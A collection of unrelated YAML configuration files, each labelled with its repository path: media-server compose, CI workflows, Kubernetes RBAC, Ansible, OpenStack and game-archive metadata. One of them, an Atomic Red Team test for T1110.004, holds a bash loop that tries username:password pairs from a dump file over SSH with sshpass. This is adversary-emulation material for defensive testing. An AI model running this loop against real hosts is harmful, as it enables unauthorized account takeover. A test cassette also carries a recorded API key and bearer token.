TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/jackett/config:/config'
- '/mnt/data/jackett/blackhole:/downloads'
plex:
container_name: 'plex'
image: linuxserver/plex:latest
restart: always
depends_on:
- media
ports:
- '32400:32400'
- '32400:32400/udp'
- '32469:32469'
- '32469:32469/udp'
- '5353:5353/udp'
- '1900:1900/udp'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
VERSION: 'latest'
volumes:
- '/mnt/data/plex/config:/config'
- '/mnt/data/media/unionfs:/unionfs:shared'
- '/mnt/data/plex/transcode:/transcode'
network_mode: 'host'
|
docker-compose.yml
|
interactions:
- request:
body: '{"username": null, "password": <PASSWORD>, "apikey": "2AE5D1E42E7194B9"}'
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Accept-Language: [en]
Connection: [keep-alive]
Content-Length: ['66']
Content-Type: [application/json]
User-Agent: [Subliminal/2.0]
method: POST
uri: https://api.thetvdb.com/login
response:
body:
string: !!binary |
H4sIAAAAAAAAAwTBSZKqMAAA0H2fwnJvFyio/B1DgAASmYywoZhJALEYGuFX373f+/+12+2nvile
+3+7fbEadaplBBHDCzbI2gSO8OXymQzPsHk/H7IhfBer0Ra6SBAFjE1FBvnhcvNvI+zaBtKeZKcH
SbV2SjBfpzIcYSesCc7LBKsMpP3HVsLFVkTepmArnW9x01hx9OZ8tkpauokz9Rpy5+GePNswAR+o
ROGJIgVbZw/VeiMCP4vhw61+iqUt6CJNqzyxmzqINEqBXEkgKDrHNm766tZwQTduJdKBMu/OGr13
dGJzPze50jYupqT7Fufr9wEdNyGKQYUFC0pCTUwr6uyrKJAww31eckEhxKesRfqab8DpVYvtUq8Q
jYFR2dfMS5yDG7+mqFO3s2NipYIHc1TT+bp4mna0ia6+BtOUYwwEK9yurvdRZaAISgXuXkBYD9cQ
aWBaxzzwTJSpF/0ZMunmvd48FC9KfDkinotZHZ6LrbsOs8PNbPCEPzg5Tgc7guKqDmvGsc3hHpE2
hedq//X7BwAA//8DABKqMSrbAQAA
headers:
cf-ray: [29217b33c0703bbd-CDG]
connection: [keep-alive]
content-encoding: [gzip]
content-type: [application/json]
date: ['Mon, 11 Apr 2016 21:20:13 GMT']
server: [cloudflare-nginx]
set-cookie: ['__cfduid=d1bdd673311350ca09def97d4e47630e81460409613; expires=Tue,
11-Apr-17 21:20:13 GMT; path=/; domain=.thetvdb.com; HttpOnly']
vary: [Accept-Language]
x-powered-by: [Thundar!]
x-thetvdb-api-version: [2.0.0]
status: {code: 200, message: OK}
- request:
body: null
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Accept-Language: [en]
Authorization: [!!python/unicode 'Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE0NjA0OTYwMTMsImlkIjoic3VibGltaW5hbCIsIm9yaWdfaWF0IjoxNDYwNDA5NjEzfQ.AzG1AsSuduLfjfRaQtoGORurPaXlYaExIDZY3jODWL6SOhHkAETc_IVRgvewlejwBtyCt1zFrAjZbECgBEUemQNJMHyRhIwOM4yiB-j0pmLsSpZ31dTdK4fNJ7KBHTL4THPrO2z9Z_EgW9LIB9hiKLZmN8A9iYcWodf4Ue9_3clOHydzEQoFL1mbSeAJr0F1nu5B4QWkThjOmFz6QKWDgI-KsFbu8wSGG2NiHFnrKKC_WE9LYz8RSxFCED9DgEPSUi1SWhIOGEtysdUSKOcF7HXY0bzSnp5IA7D_72O54_1HI6ezm8ruQ4u1UXIvWa2t-NZIAyFryc41k-PZilbI6g']
Connection: [keep-alive]
Content-Type: [application/json]
Cookie: [__cfduid=d1bdd673311350ca09def97d4e47630e81460409613]
User-Agent: [Subliminal/2.0]
method: GET
uri: https://api.thetvdb.com/series/80379/episodes/query?airedSeason=99&page=1
response:
body:
string: !!binary |
H4sIAAAAAAAAA6rmUlBQci0qyi9SslJQ8stXKEotLs0pKVZIyy9SqMwvLVIoLE0tqrRSyE0siA5O
TSzOz7OytFQoKUvVK04tykwt9kyxsjAwNreMVeKqBQAAAP//AwB+XqRhTQAAAA==
headers:
cache-control: ['private, max-age=300']
cf-ray: [29217b37508c3bbd-CDG]
connection: [keep-alive]
content-encoding: [gzip]
content-type: [application/json]
date: ['Mon, 11 Apr 2016 21:20:14 GMT']
server: [cloudflare-nginx]
vary: [Accept-Language]
x-powered-by: [Thundar!]
x-thetvdb-api-version: [2.0.0]
status: {code: 404, message: Not Found}
version: 1
|
tests/cassettes/tvdb/test_query_series_episodes_wrong_season.yaml
|
name: networks
desc: Neighborhood Accessibility Variables
model_type: networks
node_col: node_id
variable_definitions:
- aggregation: sum
dataframe: buildings
decay: linear
filters:
- general_type == "Retail"
name: retail_sqft_3000
radius: 3000
varname: non_residential_sqft
- aggregation: sum
dataframe: households
decay: flat
name: sum_income_3000
radius: 3000
varname: income
- name: residential_units_500
dataframe: buildings
varname: residential_units
radius: 500
apply: np.log1p
- name: residential_units_1500
dataframe: buildings
varname: residential_units
radius: 1500
apply: np.log1p
- name: office_1500
dataframe: buildings
varname: job_spaces
filters:
- general_type == "Office"
radius: 1500
apply: np.log1p
- name: retail_1500
dataframe: buildings
varname: job_spaces
filters:
- general_type == "Retail"
radius: 1500
apply: np.log1p
- name: industrial_1500
dataframe: buildings
varname: job_spaces
filters:
- general_type == "Industrial"
radius: 1500
apply: np.log1p
- name: ave_sqft_per_unit
dataframe: buildings
varname: sqft_per_unit
filters:
- general_type == "Residential"
radius: 1500
apply: np.log1p
decay: flat
aggregation: average
- name: ave_lot_size_per_unit
dataframe: buildings
varname: lot_size_per_unit
filters:
- general_type == "Residential"
radius: 1500
apply: np.log1p
decay: flat
aggregation: average
- name: population
filters:
- building_id != -1
dataframe: households
varname: persons
radius: 1500
apply: np.log1p
- name: poor
dataframe: households
filters:
- income < 40000 and building_id != -1
varname: persons
radius: 1500
apply: np.log1p
- name: renters
dataframe: households
filters:
- tenure == 2 and building_id != -1
radius: 1500
apply: np.log1p
- name: sfdu
dataframe: buildings
filters:
- building_type_id == 1
radius: 1500
apply: np.log1p
- name: ave_hhsize
dataframe: households
filters:
- building_id != -1
varname: persons
radius: 1500
aggregation: average
decay: flat
apply: np.log1p
- name: jobs_500
filters:
- building_id != -1
dataframe: jobs
radius: 500
apply: np.log1p
- name: jobs_1500
filters:
- building_id != -1
dataframe: jobs
radius: 1500
apply: np.log1p
- name: ave_income_1500
aggregation: 75pct
filters:
- building_id != -1
dataframe: households
varname: income
radius: 1500
decay: flat
apply: np.log1p
- name: ave_income_500
aggregation: median
filters:
- building_id != -1
dataframe: households
varname: income
radius: 500
decay: flat
apply: np.log1p
|
bayarea_urbansim/configs/neighborhood_vars.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-19 16:57"
game: "Unreal Tournament"
name: "DM-RP-Kelvin"
author: "Jared \"FrEaKy\" Lacey"
description: "Look At Hunter's Cool Skybox!!!!!"
releaseDate: "2015-10"
attachments:
- type: "IMAGE"
name: "DM-RP-Kelvin_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/DeathMatch/R/DM-RP-Kelvin_shot_1.png"
originalFilename: "DM-RP-Kelvin.zip"
hash: "21ba34aa75395c3bfd3f8ed9ef5562a90e1249ff"
fileSize: 7740651
files:
- name: "arena.utx"
fileSize: 4839798
hash: "1e649c8384a83ac3e567f9e7e5e572a8182f24ce"
- name: "DM-RP-Kelvin.unr"
fileSize: 1835943
hash: "25f10e8972a9e8ceef2b96e3111a6bd6d0e85402"
- name: "JumpPad.u"
fileSize: 12138
hash: "e6df5a06b2b081d3a4d429d95be1d21dff09c36b"
- name: "QUAKE3c.utx"
fileSize: 1756884
hash: "24825a99bdc76cda3eb138fdf37d69e510d560f9"
- name: "comefor.umx"
fileSize: 855950
hash: "09d7491efd2b45f46320641fc5a3ba288b44560b"
- name: "richrig.utx"
fileSize: 2234223
hash: "e2115772791315c91cdf6ab99e687d2f94e5685d"
- name: "Eodan.utx"
fileSize: 5391
hash: "d2614f314dcb7b1f1c043cc0cbd8623ab20384f1"
otherFiles: 0
dependencies:
DM-RP-Kelvin.unr:
- status: "OK"
name: "QUAKE3c"
downloads:
- url: "http://medor.no-ip.org/index.php?dir=Maps/DeathMatch&file=DM-RP-Kelvin.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/DeathMatch/R/DM-RP-Kelvin.zip"
main: true
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/DeathMatch/R/2/1/ba34aa/DM-RP-Kelvin.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/DeathMatch/R/2/1/ba34aa/DM-RP-Kelvin.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "DeathMatch"
title: "The Kelvin Garden's for RaTPacK"
playerCount: "6-8"
themes:
Tech: 0.5
Nali Castle: 0.4
bots: true
|
content/Unreal Tournament/Maps/DeathMatch/R/2/1/ba34aa/dm-rp-kelvin_[21ba34aa].yml
|
--- !<SKIN>
contentType: "SKIN"
firstIndex: "2018-12-26 14:51"
game: "Unreal Tournament 2004"
name: "Assassin"
author: "Unknown"
description: "None"
releaseDate: "2002-10"
attachments:
- type: "IMAGE"
name: "Assassin_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_2.png"
- type: "IMAGE"
name: "Assassin_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_4.png"
- type: "IMAGE"
name: "Assassin_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_1.png"
- type: "IMAGE"
name: "Assassin_shot_5.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_5.png"
- type: "IMAGE"
name: "Assassin_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_3.png"
originalFilename: "assassin.zip"
hash: "6a12f79664fa91587dea1a1b2e915a9aa71ac8a4"
fileSize: 1273345
files:
- name: "Assassin.upl"
fileSize: 313
hash: "366efb328c85ed826d3e4317c8bfc32d7cfe265c"
- name: "Assassin.utx"
fileSize: 2972131
hash: "5b41b649a10254a9d060445f3432a025d579ea5f"
otherFiles: 7
dependencies: {}
downloads:
- url: "https://gamefront.online/files2/service/thankyou?id=645246"
main: false
repack: false
state: "MISSING"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament%202004/Skins/A/assassin.zip"
main: true
repack: false
state: "OK"
- url: "https://gamefront.online/files2/service/thankyou?id=849267"
main: false
repack: false
state: "MISSING"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament%202004/Skins/A/6/a/12f796/assassin.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament%202004/Skins/A/6/a/12f796/assassin.zip"
main: false
repack: false
state: "OK"
deleted: false
skins:
- "Assassin"
faces: []
model: "Unknown"
teamSkins: false
|
content/Unreal Tournament 2004/Skins/A/6/a/12f796/assassin_[6a12f796].yml
|
name: Publish latest version
on:
push:
branches:
- main
paths-ignore:
- '**/package.json'
- 'lerna.json'
- '**.md'
- 'packages/example/**'
jobs:
publish:
name: Publish
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Setup node
uses: actions/setup-node@v2
with:
node-version: '14'
registry-url: 'https://registry.npmjs.org'
# Enable lerna to commit on GitHub.
# Note that this does not work with protected branch.
- name: Configure git identity
run: |
git config --global user.name 'github-actions[bot]'
git config --global user.email '<EMAIL>[<EMAIL>'
git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/$GITHUB_REPOSITORY
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Install
run: yarn --frozen-lockfile
- name: Build
run: yarn build
# zenn-editor packages does not follow semantic versioning.
# This is because anyone should use latest version which is synced with zenn.dev
- name: Bump version to latest
run: lerna version patch --yes --no-private
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Set released version to env
run: node -p -e '`RELEASED_PACKAGE_VERSION=${require("./lerna.json").version}`' >> $GITHUB_ENV
- name: Create release
uses: release-drafter/release-drafter@v5
with:
version: ${{ env.RELEASED_PACKAGE_VERSION }}
name: ${{ env.RELEASED_PACKAGE_VERSION }}
tag: ${{ env.RELEASED_PACKAGE_VERSION }}
publish: true
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Publish latest
run: 'lerna publish from-package --yes'
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Notifiy releases to zenn-dev/zenn
uses: peter-evans/repository-dispatch@v1
with:
repository: zenn-dev/zenn
token: ${{ secrets.PERSONAL_TOKEN }}
event-type: update-zenn-editor-packages # specify this on zenn workflows
- name: Notifiy releases to zenn-dev/api-markdown-html
uses: peter-evans/repository-dispatch@v1
with:
repository: zenn-dev/api-markdown-html
token: ${{ secrets.PERSONAL_TOKEN }}
event-type: update-zenn-editor-packages # specify this on zenn workflows
- name: Checkout
uses: actions/checkout@v2
with:
ref: canary
- name: Reflect changes on main branch to canary branch.
run: |
git pull origin main
git push origin HEAD
|
.github/workflows/publish-latest.yml
|
name: Create release
on:
workflow_dispatch:
inputs:
version:
description: 'Version'
required: true
pre_release:
description: 'Is this a pre-release?'
required: true
default: 'true'
draft:
description: 'Draft?'
required: true
default: 'true'
jobs:
build:
runs-on: windows-latest
env:
Solution_Path: src/GameJoltLibrary.sln
DOTNET_NOLOGO: true
DOTNET_SKIP_FIRST_TIME_EXPERIENCE: true
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
# Install the .NET Core workload
- name: Install .NET Core
uses: actions/setup-dotnet@v1
with:
dotnet-version: 6.0.x
# Add MSBuild to the PATH: https://github.com/microsoft/setup-msbuild
- name: Setup MSBuild.exe
uses: microsoft/setup-msbuild@v1.0.2
- name: Restore dependencies GameJoltLibrary
run: dotnet restore $env:Solution_Path
- name: Build GameJoltLibrary
run: dotnet build --no-restore --configuration Release $env:Solution_Path
- name: Build Playnite
run: |
ref/PlayniteRepo/build/build.ps1
- name: pack GameJolLibrary
run: |
ref/PlayniteRepo/build/Release/Toolbox.exe pack build/Release build/pack
- name: Upload artifact for deployment job
uses: actions/upload-artifact@v2
with:
name: gamejoltlibrary
path: build/pack
deploy:
runs-on: ubuntu-latest
needs: build
environment:
name: 'Development'
steps:
- name: Download artifact from build job
uses: actions/download-artifact@v2
with:
name: gamejoltlibrary
path: pack
- name: Automatic Releases
uses: marvinpinto/action-automatic-releases@v1.2.1
with:
repo_token: "${{ secrets.GITHUB_TOKEN }}"
automatic_release_tag: ${{ github.event.inputs.version }}
prerelease: true
draft: true
files: |
pack/*.pext
|
.github/workflows/create-release.yml
|
uid: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort.fromFrontendHttpsPort*"
fullName: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort"
name: "fromFrontendHttpsPort"
nameWithType: "ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort"
members:
- uid: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort.fromFrontendHttpsPort(int)"
fullName: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort(int portNumber)"
name: "fromFrontendHttpsPort(int portNumber)"
nameWithType: "ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort(int portNumber)"
summary: "Associates a new listener for the specified port number and the HTTPS protocol with this rule."
parameters:
- description: "the port number to listen to"
name: "portNumber"
type: "<xref href=\"int?alt=int&text=int\" data-throw-if-not-resolved=\"False\" />"
syntax: "public abstract ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithSslCertificate<ParentT> fromFrontendHttpsPort(int portNumber)"
returns:
description: "the next stage of the definition, or null if the specified port number is already used for a\n different protocol"
type: "<xref href=\"com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithSslCertificate?alt=com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithSslCertificate&text=WithSslCertificate\" data-throw-if-not-resolved=\"False\" /><<xref href=\"ParentT?alt=ParentT&text=ParentT\" data-throw-if-not-resolved=\"False\" />>"
type: "method"
metadata: {}
package: "com.azure.resourcemanager.network.models"
artifact: com.azure.resourcemanager:azure-resourcemanager-network:2.2.0
|
docs-ref-autogen/com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort.fromFrontendHttpsPort.yml
|
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
creationTimestamp: null
name: manager-role
rules:
- apiGroups:
- ""
resources:
- configmaps
- persistentvolumes
verbs:
- '*'
- apiGroups:
- config.openshift.io
resources:
- infrastructures
- networks
verbs:
- get
- list
- watch
- apiGroups:
- integreatly.org
resources:
- postgres
- postgressnapshots
- redis
- redissnapshots
verbs:
- list
- watch
- apiGroups:
- monitoring.coreos.com
resources:
- prometheusrules
verbs:
- '*'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
creationTimestamp: null
name: manager-role
namespace: cloud-resource-operator
rules:
- apiGroups:
- ""
resources:
- configmaps
- endpoints
- events
- persistentvolumeclaims
- pods
- pods/exec
- secrets
- services
- services/finalizers
verbs:
- '*'
- apiGroups:
- apps
resources:
- '*'
verbs:
- '*'
- apiGroups:
- cloud-resource-operator
resources:
- deployments/finalizers
verbs:
- update
- apiGroups:
- cloudcredential.openshift.io
resources:
- credentialsrequests
verbs:
- '*'
- apiGroups:
- config.openshift.io
resources:
- '*'
- authentications
- builds
- clusteroperators
- featuregates
- infrastructures
- ingresses
- networks
- schedulers
verbs:
- '*'
- apiGroups:
- integreatly
resources:
- '*'
verbs:
- '*'
- apiGroups:
- integreatly.org
resources:
- '*'
- postgres
- postgressnapshots
- redis
- redissnapshots
- smtpcredentialset
verbs:
- '*'
- apiGroups:
- integreatly.org
resources:
- blobstorages
verbs:
- create
- delete
- get
- list
- patch
- update
- watch
- apiGroups:
- integreatly.org
resources:
- blobstorages/status
verbs:
- get
- patch
- update
- apiGroups:
- monitoring.coreos.com
resources:
- prometheusrules
verbs:
- '*'
- apiGroups:
- monitoring.coreos.com
resources:
- servicemonitors
verbs:
- create
- get
- apiGroups:
- operators.coreos.com
resources:
- catalogsources
verbs:
- get
- patch
- update
|
config/rbac/role.yaml
|
### messages ###
Prefix: '&3[&6&liSpy&3] '
#------------------------------------------#
PrefixCommand: '&3[&6&lCMD-SPY&3] '
prefixBook: '&3[&6&lBOOK-SPY&3] '
PrefixSign: '&3[&6&lSIGN-SPY&3] '
PrefixAnvil: '&3[&6&lANVIL-SPY&3] '
BookOutput: '&9%player%&f: &e%text%'
#------------------------------------------#
PlayerUsedCommand: '&9%player%&f: &e%cmd%'
PlayerPlaceSign: '&9%player%&f: &e%line1% &c&l¤ &e%line2% &c&l¤ &e%line3% &c&l¤ &e%line4%'
PlayerUsedAnvil: '&c%player% &9renamed &c%item% &9to&f: &b%renamed%'
DontHavePerm: '&cYou do not have permission to execute that command.'
HelpCommands: '&7Commands: &a/ispy cmd'
HelpCommandsLabel: '&2&liSpy'
HelpInfo: '&3/ispy &7- shows iSpy info'
HelpCmd: '&3/ispy cmd &7- shows all CommandSpy commands'
HelpVersion: '&3/ispy version &7- shows CommandSpy version'
HelpReload: '&3/ispy reload &7- reloads the plugin'
HelpAllow: '&3/ispy allow &7- enable/disable log messages in chat'
ReloadPlugin: '&7Reload successful!'
# /ispy enable/disable
onEnable: ' is now enabled for you!'
onDisable: ' is now disabled for you!'
alreadyEnabled: ' is already enabled.'
alreadyDisabled: ' is already disabled.'
MessagesDisabled: '&7Logging is disabled!'
MessagesEnabled: '&7Logging is enabled!'
OnPluginEnable: '[iSpy] Enabling iSpy'
OnPluginDisable: '[iSpy] Disabling iSpy'
#------------------------------------------#
PrefixConsoleCommand: '[CMD SPY] '
PrefixConsoleSign: '[SIGN SPY] '
PrefixConsoleAnvil: '[ANVIL SPY] '
PrefixConsoleBook: '[BOOK SPY] '
#------------------------------------------#
ConsoleNoticeCmd: '%player%: %cmd%'
ConsoleNoticeBook: '%player%: %text%'
ConsoleNoticeSigns: '%player%: %line1% / %line2% / %line3% / %line4% '
ConsoleNoticeAnvils: '%player% renamed %item% to: %renamed%'
### commands which are not logged ###
HiddenCommands:
- /lag
- /msg
- /w
- /r
- /m
- /t
- /whisper
- /emsg
- /tell
- /er
- /reply
- /ereply
- /email
- /action
- /describe
- /eme
- /eaction
- /edescribe
- /etell
- /ewhisper
- /pm
- /rcmd
- /mycmd-reload all
- /plm
- /pex
- /v
- /vm
- /vr
- /vanish
- /pv
- /afp
- /af playerchat
- /schem
- //schem
- /troll
- /whitelist
- /announceconnected
- /hc
- /pgs
### things which will be logged into chat ###
LogCommands: true
LogSigns: true
LogAnvils: true
LogBooks: true
### things which will be logged into console ###
ConsoleCommands: true
ConsoleAnvils: true
ConsoleSigns: true
ConsoleBooks: true
|
iSpy/src/main/resources/config.yml
|
- set_fact:
infra_project: "{{ infra_project | default('infra') }}"
- name: Create project
command: oc {{ openshift_env.oc_admin_kubeconfig_arg }} new-project {{ infra_project }}
ignore_errors: true
- name: Install Nexus App
shell: |
oc {{ openshift_env.oc_admin_kubeconfig_arg }} new-app sonatype/nexus -n {{ infra_project }}
oc {{ openshift_env.oc_admin_kubeconfig_arg }} expose svc/nexus -n {{ infra_project }}
oc {{ openshift_env.oc_admin_kubeconfig_arg }} set probe dc/nexus -n {{ infra_project }} \
--liveness \
--failure-threshold 3 \
--initial-delay-seconds 30 \
-- echo ok
oc {{ openshift_env.oc_admin_kubeconfig_arg }} set probe dc/nexus -n {{ infra_project }} \
--readiness \
--failure-threshold 3 \
--initial-delay-seconds 30 \
--get-url=http://:8081/nexus/content/groups/public
- block:
- set_fact:
claim_name: nexus-pv
- name: Remove existing claim
command: oc {{ openshift_env.oc_admin_kubeconfig_arg }} delete pvc {{ claim_name }} -n {{ infra_project }} --ignore-not-found=true
- name: Enable persistence
shell: |
oc {{ openshift_env.oc_admin_kubeconfig_arg }} set volume dc/nexus -n {{ infra_project }} --add \
--name 'nexus-volume-1' \
--type 'pvc' \
--mount-path '/sonatype-work/' \
--claim-name '{{ claim_name }}' \
--claim-size '5G' \
--overwrite
when: persistence
- name: Get Nexus Route
shell: oc {{ openshift_env.oc_admin_kubeconfig_arg }} get route nexus -n {{ infra_project }} -o jsonpath='http://{.spec.host}/nexus'
register: nexus_address
- name: Wait till Nexus is Up
uri:
url: "{{ nexus_address.stdout }}/content/repositories/central/archetype-catalog.xml"
status_code: 200
register: result
until: result.status == 200
retries: 20
delay: 30
- name: Create JBoss Repos
uri:
url: "{{ nexus_address.stdout }}/{{ item.value.path }}"
method: POST
return_content: no
status_code: 201
user: "admin"
password: "<PASSWORD>"
body: "{{ lookup('file', role_path ~ '/files/' ~ item.value.file) }}"
body_format: json
with_dict: "{{ repos }}"
ignore_errors: true
- name: Create Groups for the Nexus repos
uri:
url: "{{ nexus_address.stdout }}/{{ item.value.path }}"
method: POST
return_content: no
status_code: 201
user: "admin"
password: "<PASSWORD>"
body: "{{ lookup('file', role_path ~ '/files/' ~ item.value.file) }}"
body_format: json
with_dict: "{{ group_repos }}"
ignore_errors: true
|
ansible/roles/install_nexus/tasks/main.yml
|
---
attack_technique: T1110.004
display_name: 'Brute Force: Credential Stuffing'
atomic_tests:
- name: SSH Credential Stuffing From Linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
executor:
name: bash
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From MacOS
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- macos
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
executor:
name: bash
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
atomics/T1110.004/T1110.004.yaml
|
heat_template_version: queens
description: >
OpenStack Panko service configured with Puppet
parameters:
ServiceData:
default: {}
description: Dictionary packing service data
type: json
ServiceNetMap:
default: {}
description: Mapping of service_name -> network name. Typically set
via parameter_defaults in the resource registry. This
mapping overrides those in ServiceNetMapDefaults.
type: json
DefaultPasswords:
default: {}
type: json
RoleName:
default: ''
description: Role name on which the service is applied
type: string
RoleParameters:
default: {}
description: Parameters specific to the role
type: json
EndpointMap:
default: {}
description: Mapping of service endpoint -> protocol. Typically set
via parameter_defaults in the resource registry.
type: json
PankoPassword:
description: The password for the panko services.
type: string
hidden: true
Debug:
default: false
description: Set to True to enable debugging on all services.
type: boolean
PankoDebug:
default: ''
description: Set to True to enable debugging Panko services.
type: string
constraints:
- allowed_values: [ '', 'true', 'True', 'TRUE', 'false', 'False', 'FALSE']
KeystoneRegion:
type: string
default: 'regionOne'
description: Keystone region for endpoint
EnablePankoExpirer:
type: boolean
default: true
description: Enable panko expirer to periodically delete events from db
PankoExpirerMinute:
type: string
description: >
Cron to delete events data from db - Minute
default: '1'
PankoExpirerHour:
type: string
description: >
Cron to delete events data from db - Hour
default: '0'
PankoExpirerMonthday:
type: string
description: >
Cron to delete events data from db - Month Day
default: '*'
PankoExpirerMonth:
type: string
description: >
Cron to delete events data from db - Month
default: '*'
PankoExpirerWeekday:
type: string
description: >
Cron to delete events from db - Week Day
default: '*'
conditions:
service_debug_unset: {equals : [{get_param: PankoDebug}, '']}
outputs:
role_data:
description: Role data for the Panko role.
value:
service_name: panko_base
config_settings:
enable_panko_expirer: {get_param: EnablePankoExpirer}
panko::db::database_connection:
make_url:
scheme: {get_param: [EndpointMap, MysqlInternal, protocol]}
username: panko
password: {get_param: PankoPassword}
host: {get_param: [EndpointMap, MysqlInternal, host]}
path: /panko
query:
read_default_file: /etc/my.cnf.d/tripleo.cnf
read_default_group: tripleo
panko::debug:
if:
- service_debug_unset
- {get_param: Debug }
- {get_param: PankoDebug }
panko::auth::auth_url: {get_param: [EndpointMap, KeystoneInternal, uri_no_suffix] }
panko::keystone::authtoken::project_name: 'service'
panko::keystone::authtoken::user_domain_name: 'Default'
panko::keystone::authtoken::project_domain_name: 'Default'
panko::keystone::authtoken::password: {get_param: <PASSWORD>}
panko::keystone::authtoken::auth_uri: {get_param: [EndpointMap, KeystoneInternal, uri_no_suffix] }
panko::keystone::authtoken::auth_url: { get_param: [EndpointMap, KeystoneInternal, uri_no_suffix] }
panko::auth::auth_password: {get_param: <PASSWORD>Password}
panko::auth::auth_region: {get_param: KeystoneRegion}
panko::auth::auth_tenant_name: 'service'
panko::expirer::minute: {get_param: PankoExpirerMinute}
panko::expirer::hour: {get_param: PankoExpirerHour}
panko::expirer::monthday: {get_param: PankoExpirerMonthday}
panko::expirer::month: {get_param: PankoExpirerMonth}
panko::expirer::weekday: {get_param: PankoExpirerWeekday}
service_config_settings:
keystone:
panko::keystone::auth::public_url: {get_param: [EndpointMap, PankoPublic, uri]}
panko::keystone::auth::internal_url: {get_param: [EndpointMap, PankoInternal, uri]}
panko::keystone::auth::admin_url: {get_param: [EndpointMap, PankoAdmin, uri]}
panko::keystone::auth::password: {get_param: PankoPassword}
panko::keystone::auth::region: {get_param: KeystoneRegion}
panko::keystone::auth::tenant: 'service'
mysql:
panko::db::mysql::user: panko
panko::db::mysql::password: {get_param: PankoPassword}
panko::db::mysql::host: {get_param: [EndpointMap, MysqlInternal, host_nobrackets]}
panko::db::mysql::dbname: panko
